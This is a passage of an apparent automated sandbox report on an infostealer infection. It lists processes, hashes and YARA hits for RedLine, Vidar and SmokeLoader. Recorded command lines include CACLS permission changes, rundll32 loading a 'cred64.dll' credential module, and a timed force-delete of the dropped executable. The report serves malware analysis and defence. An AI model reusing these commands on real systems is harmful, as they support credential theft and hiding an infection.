                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:16:58:36
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:16:58:36
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Imagebase:0xc40000
                                                                                                                                                                                                File size:341006 bytes
                                                                                                                                                                                                MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 27%, ReversingLabs

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:16:58:37
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:CACLS "..\99e342142d" /P "user:N"
                                                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                                                File size:27648 bytes
                                                                                                                                                                                                MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:16:58:38
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:CACLS "..\99e342142d" /P "user:R" /E
                                                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                                                File size:27648 bytes
                                                                                                                                                                                                MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:16:58:39
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Imagebase:0xc40000
                                                                                                                                                                                                File size:341006 bytes
                                                                                                                                                                                                MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:16:58:39
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\F771.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\F771.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:459264 bytes
                                                                                                                                                                                                MD5 hash:DF920AEBFABB8C4CCCEB4DCEAD922ABD
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:16:58:40
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:16:58:42
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                Imagebase:0x7ff69fe90000
                                                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:16:58:43
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:16:58:43
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EB2B.exe
                                                                                                                                                                                                Imagebase:0xc40000
                                                                                                                                                                                                File size:341006 bytes
                                                                                                                                                                                                MD5 hash:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.522046166.000000000127B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                Start time:16:58:44
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                Imagebase:0x7ff69fe90000
                                                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                Start time:16:58:46
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                Start time:16:58:48
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                Start time:16:58:50
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                                                                                Imagebase:0xe20000
                                                                                                                                                                                                File size:61952 bytes
                                                                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:Borland Delphi

                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                Start time:16:58:50
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                Start time:16:58:51
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                Imagebase:0x7ff69fe90000
                                                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                Start time:16:58:52
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:3611360 bytes
                                                                                                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                Start time:16:59:09
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
                                                                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                Start time:16:59:10
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                Start time:16:59:11
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:timeout /t 6
                                                                                                                                                                                                Imagebase:0x20000
                                                                                                                                                                                                File size:26112 bytes
                                                                                                                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                Start time:16:59:14
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                Imagebase:0x2adbfe50000
                                                                                                                                                                                                File size:44640 bytes
                                                                                                                                                                                                MD5 hash:59FCE79E9D81AB9E2ED4C3561205F5DF
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_GoStealer, Description: Yara detected Go Stealer, Source: 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                No disassembly